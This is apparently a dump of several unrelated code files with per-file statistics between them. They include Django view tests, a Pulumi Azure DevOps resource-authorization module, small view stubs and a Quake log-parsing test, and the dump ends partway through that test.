np.testing.assert_equal(cp.traj[2, 1], 3)
np.testing.assert_equal(cp.traj[2, 2], 3)
| 27.65625
| 77
| 0.629002
| 390
| 2,655
| 4.164103
| 0.166667
| 0.083128
| 0.138547
| 0.184729
| 0.87931
| 0.87931
| 0.87931
| 0.862685
| 0.786946
| 0.786946
| 0
| 0.044784
| 0.259887
| 2,655
| 95
| 78
| 27.947368
| 0.781679
| 0.235405
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.277778
| 1
| 0.055556
| false
| 0
| 0.12963
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0efd93d5baa1d7af4b2db7511a7853478f91ac01
| 3,682
|
py
|
Python
|
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
sports_manager/tests/team/tests_team_list_view.py
|
hbuyse/dj-sports-manager
|
7e32cc41347b968b4ede9ea6846de14d9504c3f9
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the views."""
# Django
from django.test import TestCase
from django.urls import reverse
from ..helper import create_team, create_user
class TestTeamListViewAsAnonymous(TestCase):
"""Tests ListView for Team."""
def tests_empty(self):
"""Tests."""
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 0)
def tests_one_team(self):
"""Tests."""
t = create_team()[1]
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 1)
self.assertIn(t, r.context['team_list'])
class TestTeamListViewAsLogged(TestCase):
"""Tests ListView for Team."""
def setUp(self):
"""Create a user that will be able to log in."""
self.user_info, self.user = create_user()
def tests_empty(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 0)
def tests_one_team(self):
"""Tests."""
t = create_team()[1]
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 1)
self.assertIn(t, r.context['team_list'])
class TestTeamListViewAsStaff(TestCase):
"""Tests ListView for Team."""
def setUp(self):
"""Create a user that will be able to log in."""
self.user_info, self.user = create_user(staff=True)
def tests_empty(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 0)
def tests_one_team(self):
"""Tests."""
t = create_team()[1]
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 1)
self.assertIn(t, r.context['team_list'])
class TestTeamListViewAsSuperuser(TestCase):
"""Tests ListView for Team."""
def setUp(self):
"""Create a user that will be able to log in."""
self.user_info, self.user = create_user(superuser=True)
def tests_empty(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 0)
def tests_one_team(self):
"""Tests."""
t = create_team()[1]
self.assertTrue(self.client.login(username=self.user_info['username'], password=self.user_info['password']))
r = self.client.get(reverse('sports-manager:team-list'))
self.assertEqual(r.status_code, 200)
self.assertEqual(len(r.context['team_list']), 1)
self.assertIn(t, r.context['team_list'])
| 32.584071
| 116
| 0.644758
| 482
| 3,682
| 4.809129
| 0.134855
| 0.069025
| 0.077653
| 0.08283
| 0.889991
| 0.881795
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0
| 0.012479
| 0.194731
| 3,682
| 112
| 117
| 32.875
| 0.769309
| 0.093156
| 0
| 0.830508
| 0
| 0
| 0.121622
| 0.058968
| 0
| 0
| 0
| 0
| 0.440678
| 1
| 0.186441
| false
| 0.101695
| 0.050847
| 0
| 0.305085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
16021bd02d0f286f9d992c4a5790816b0decbc8c
| 205
|
py
|
Python
|
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/auth.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
from django import http, views
class LoginView(views.View):
pass
class LoginRequestView(views.View):
pass
class LoginInviteView(views.View):
pass
class LogoutView(views.View):
pass
| 11.388889
| 35
| 0.717073
| 25
| 205
| 5.88
| 0.48
| 0.244898
| 0.353742
| 0.367347
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 205
| 17
| 36
| 12.058824
| 0.896341
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
1614bd379a064cf1b368c49505c5734a4185c2eb
| 16,678
|
py
|
Python
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2020-06-28T11:39:32.000Z
|
2022-03-05T13:34:16.000Z
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 58
|
2020-06-20T14:00:28.000Z
|
2022-03-31T15:20:51.000Z
|
sdk/python/pulumi_azuredevops/resource_authorization.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-21T03:22:01.000Z
|
2021-12-10T18:26:59.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ResourceAuthorizationArgs', 'ResourceAuthorization']
@pulumi.input_type
class ResourceAuthorizationArgs:
def __init__(__self__, *,
authorized: pulumi.Input[bool],
project_id: pulumi.Input[str],
resource_id: pulumi.Input[str],
definition_id: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ResourceAuthorization resource.
:param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
:param pulumi.Input[str] project_id: The project ID or project name. Type: string.
:param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
:param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
:param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
pulumi.set(__self__, "authorized", authorized)
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "resource_id", resource_id)
if definition_id is not None:
pulumi.set(__self__, "definition_id", definition_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def authorized(self) -> pulumi.Input[bool]:
"""
Set to true to allow public access in the project. Type: boolean.
"""
return pulumi.get(self, "authorized")
@authorized.setter
def authorized(self, value: pulumi.Input[bool]):
pulumi.set(self, "authorized", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The project ID or project name. Type: string.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The ID of the resource to authorize. Type: string.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="definitionId")
def definition_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the build definition to authorize. Type: string.
"""
return pulumi.get(self, "definition_id")
@definition_id.setter
def definition_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "definition_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _ResourceAuthorizationState:
def __init__(__self__, *,
authorized: Optional[pulumi.Input[bool]] = None,
definition_id: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResourceAuthorization resources.
:param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
:param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
:param pulumi.Input[str] project_id: The project ID or project name. Type: string.
:param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
:param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
if authorized is not None:
pulumi.set(__self__, "authorized", authorized)
if definition_id is not None:
pulumi.set(__self__, "definition_id", definition_id)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if resource_id is not None:
pulumi.set(__self__, "resource_id", resource_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def authorized(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true to allow public access in the project. Type: boolean.
"""
return pulumi.get(self, "authorized")
@authorized.setter
def authorized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "authorized", value)
@property
@pulumi.getter(name="definitionId")
def definition_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the build definition to authorize. Type: string.
"""
return pulumi.get(self, "definition_id")
@definition_id.setter
def definition_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "definition_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project ID or project name. Type: string.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource to authorize. Type: string.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class ResourceAuthorization(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized: Optional[pulumi.Input[bool]] = None,
definition_id: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages authorization of resources, e.g. for access in build pipelines.
Currently supported resources: service endpoint (aka service connection, endpoint).
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project")
bitbucket_account = azuredevops.ServiceEndpointBitBucket("bitbucketAccount",
project_id=project.id,
username="xxxx",
password="xxxx",
service_endpoint_name="test-bitbucket",
description="test")
auth = azuredevops.ResourceAuthorization("auth",
project_id=project.id,
resource_id=bitbucket_account.id,
authorized=True)
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Authorize Definition Resource](https://docs.microsoft.com/en-us/rest/api/azure/devops/build/resources/authorize%20definition%20resources?view=azure-devops-rest-5.1)
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
:param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
:param pulumi.Input[str] project_id: The project ID or project name. Type: string.
:param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
:param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResourceAuthorizationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages authorization of resources, e.g. for access in build pipelines.
Currently supported resources: service endpoint (aka service connection, endpoint).
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project")
bitbucket_account = azuredevops.ServiceEndpointBitBucket("bitbucketAccount",
project_id=project.id,
username="xxxx",
password="xxxx",
service_endpoint_name="test-bitbucket",
description="test")
auth = azuredevops.ResourceAuthorization("auth",
project_id=project.id,
resource_id=bitbucket_account.id,
authorized=True)
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Authorize Definition Resource](https://docs.microsoft.com/en-us/rest/api/azure/devops/build/resources/authorize%20definition%20resources?view=azure-devops-rest-5.1)
:param str resource_name: The name of the resource.
:param ResourceAuthorizationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourceAuthorizationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authorized: Optional[pulumi.Input[bool]] = None,
definition_id: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourceAuthorizationArgs.__new__(ResourceAuthorizationArgs)
if authorized is None and not opts.urn:
raise TypeError("Missing required property 'authorized'")
__props__.__dict__["authorized"] = authorized
__props__.__dict__["definition_id"] = definition_id
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["type"] = type
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azuredevops:Security/resourceAuthorization:ResourceAuthorization")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(ResourceAuthorization, __self__).__init__(
'azuredevops:index/resourceAuthorization:ResourceAuthorization',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
authorized: Optional[pulumi.Input[bool]] = None,
definition_id: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'ResourceAuthorization':
"""
Get an existing ResourceAuthorization resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] authorized: Set to true to allow public access in the project. Type: boolean.
:param pulumi.Input[int] definition_id: The ID of the build definition to authorize. Type: string.
:param pulumi.Input[str] project_id: The project ID or project name. Type: string.
:param pulumi.Input[str] resource_id: The ID of the resource to authorize. Type: string.
:param pulumi.Input[str] type: The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResourceAuthorizationState.__new__(_ResourceAuthorizationState)
__props__.__dict__["authorized"] = authorized
__props__.__dict__["definition_id"] = definition_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["type"] = type
return ResourceAuthorization(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def authorized(self) -> pulumi.Output[bool]:
"""
Set to true to allow public access in the project. Type: boolean.
"""
return pulumi.get(self, "authorized")
@property
@pulumi.getter(name="definitionId")
def definition_id(self) -> pulumi.Output[Optional[int]]:
"""
The ID of the build definition to authorize. Type: string.
"""
return pulumi.get(self, "definition_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The project ID or project name. Type: string.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The ID of the resource to authorize. Type: string.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
The type of the resource to authorize. Type: string. Valid values: `endpoint`, `queue`, `variablegroup`. Default value: `endpoint`.
"""
return pulumi.get(self, "type")
| 42.874036
| 211
| 0.642343
| 1,899
| 16,678
| 5.441811
| 0.100053
| 0.073447
| 0.055545
| 0.044707
| 0.805013
| 0.777724
| 0.771434
| 0.742404
| 0.723534
| 0.718212
| 0
| 0.001363
| 0.252368
| 16,678
| 388
| 212
| 42.984536
| 0.827412
| 0.356458
| 0
| 0.657005
| 1
| 0
| 0.101613
| 0.019727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.024155
| 0
| 0.270531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
161d1a991d855c4a3314b25e6e716dd6d898562a
| 165
|
py
|
Python
|
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
backend_app/react_api/views.py
|
samirbelhadjer/django_react_ecomerce
|
d0aeefb4cebac04b373679e61f7b88f125dac55a
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def sign_up(request):
return True
# Create your views here.
def sign_in(request):
return True
| 18.333333
| 35
| 0.745455
| 25
| 165
| 4.84
| 0.64
| 0.165289
| 0.247934
| 0.31405
| 0.429752
| 0.429752
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 9
| 36
| 18.333333
| 0.902985
| 0.284848
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1633bc57c366005e2c5f18e5959376abdd3ad66c
| 243,504
|
py
|
Python
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 21
|
2018-04-24T09:33:01.000Z
|
2022-03-05T10:53:45.000Z
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 42
|
2018-04-13T18:09:19.000Z
|
2021-08-05T20:23:22.000Z
|
tests/component/test_q3toql_ospffa1.py
|
brabiega/quakestats
|
1628720350a1e4e40ebebdb7988785663892f0be
|
[
"MIT"
] | 8
|
2018-06-12T18:07:39.000Z
|
2021-08-28T02:26:17.000Z
|
import pytest
from quakestats.core.q3parser.api import (
Q3ParserAPI,
)
from quakestats.core.q3toql.transform import (
Q3toQL,
)
from quakestats.system.qa import ( # noqa
_regen_asserts,
)
class TestQ3toQL_OSPFFA1():
@pytest.fixture
def osp_game_1(self, testdata_loader):
ld = testdata_loader('osp-ffa-1.log')
raw_data = ld.read()
parser_api = Q3ParserAPI()
games_logs = list(parser_api.split_games(raw_data, 'osp'))
yield parser_api.parse_game_log(games_logs[0])
def test_process(self, osp_game_1,):
tf = Q3toQL()
game = tf.transform(osp_game_1)
ql_events = list(game.get_events())
e = ql_events
# py.test tests/component/test_q3toql_ospffa1.py -vs | grep assert >> tests/component/test_q3toql_ospffa1.py # noqa
# _regen_asserts(e)
assert e[0]['DATA']['CAPTURE_LIMIT'] == 0 # noqa
assert e[0]['DATA']['FACTORY'] == 'quake3' # noqa
assert e[0]['DATA']['FACTORY_TITLE'] == 'quake3' # noqa
assert e[0]['DATA']['FRAG_LIMIT'] == 20 # noqa
assert e[0]['DATA']['GAME_TYPE'] == 'FFA' # noqa
assert e[0]['DATA']['INFECTED'] == 0 # noqa
assert e[0]['DATA']['INSTAGIB'] == 0 # noqa
assert e[0]['DATA']['MAP'] == 'ASYLUM' # noqa
assert e[0]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[0]['DATA']['MERCY_LIMIT'] == 0 # noqa
assert e[0]['DATA']['PLAYERS'][0]['NAME'] == '__world__' # noqa
assert e[0]['DATA']['PLAYERS'][0]['STEAM_ID'] == 'q3-world' # noqa
assert e[0]['DATA']['PLAYERS'][0]['TEAM'] == 0 # noqa
assert e[0]['DATA']['QUADHOG'] == 0 # noqa
assert e[0]['DATA']['ROUND_LIMIT'] == 0 # noqa
assert e[0]['DATA']['SCORE_LIMIT'] == 0 # noqa
assert e[0]['DATA']['SERVER_TITLE'] == 'noname' # noqa
assert e[0]['DATA']['TIME'] == 0.0 # noqa
assert e[0]['DATA']['TIME_LIMIT'] == 0 # noqa
assert e[0]['DATA']['TRAINING'] == 0 # noqa
assert e[0]['DATA']['WARMUP'] == False # noqa
assert e[0]['TYPE'] == 'MATCH_STARTED' # noqa
assert e[1]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[1]['DATA']['NAME'] == 'Bartoszer' # noqa
assert e[1]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[1]['DATA']['TIME'] == 0.3 # noqa
assert e[1]['DATA']['WARMUP'] == False # noqa
assert e[1]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[2]['DATA']['KILLER']['NAME'] == 'Bartoszer' # noqa
assert e[2]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[2]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[2]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[2]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[2]['DATA']['TIME'] == 0.3 # noqa
assert e[2]['DATA']['WARMUP'] == False # noqa
assert e[2]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[3]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[3]['DATA']['NAME'] == 'Daemia' # noqa
assert e[3]['DATA']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[3]['DATA']['TIME'] == 0.3 # noqa
assert e[3]['DATA']['WARMUP'] == False # noqa
assert e[3]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[4]['DATA']['KILLER']['NAME'] == 'Daemia' # noqa
assert e[4]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[4]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[4]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[4]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[4]['DATA']['TIME'] == 0.3 # noqa
assert e[4]['DATA']['WARMUP'] == False # noqa
assert e[4]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[5]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[5]['DATA']['NAME'] == 'Doom' # noqa
assert e[5]['DATA']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[5]['DATA']['TIME'] == 0.3 # noqa
assert e[5]['DATA']['WARMUP'] == False # noqa
assert e[5]['TYPE'] == 'PLAYER_CONNECT' # noqa
assert e[6]['DATA']['KILLER']['NAME'] == 'Doom' # noqa
assert e[6]['DATA']['KILLER']['OLD_TEAM'] == 'SPECTATOR' # noqa
assert e[6]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[6]['DATA']['KILLER']['TEAM'] == 'FREE' # noqa
assert e[6]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[6]['DATA']['TIME'] == 0.3 # noqa
assert e[6]['DATA']['WARMUP'] == False # noqa
assert e[6]['TYPE'] == 'PLAYER_SWITCHTEAM' # noqa
assert e[7]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[7]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[7]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[7]['DATA']['KILLER']['BOT'] is None # noqa
assert e[7]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[7]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[7]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[7]['DATA']['KILLER']['NAME'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[7]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[7]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[7]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[7]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[7]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[7]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[7]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[7]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[7]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[7]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[7]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[7]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[7]['DATA']['ROUND'] is None # noqa
assert e[7]['DATA']['SUICIDE'] is None # noqa
assert e[7]['DATA']['TEAMKILL'] is None # noqa
assert e[7]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[7]['DATA']['TEAM_DEAD'] is None # noqa
assert e[7]['DATA']['TIME'] == 15.7 # noqa
assert e[7]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[7]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[7]['DATA']['VICTIM']['ARMOR'] is None # noqa
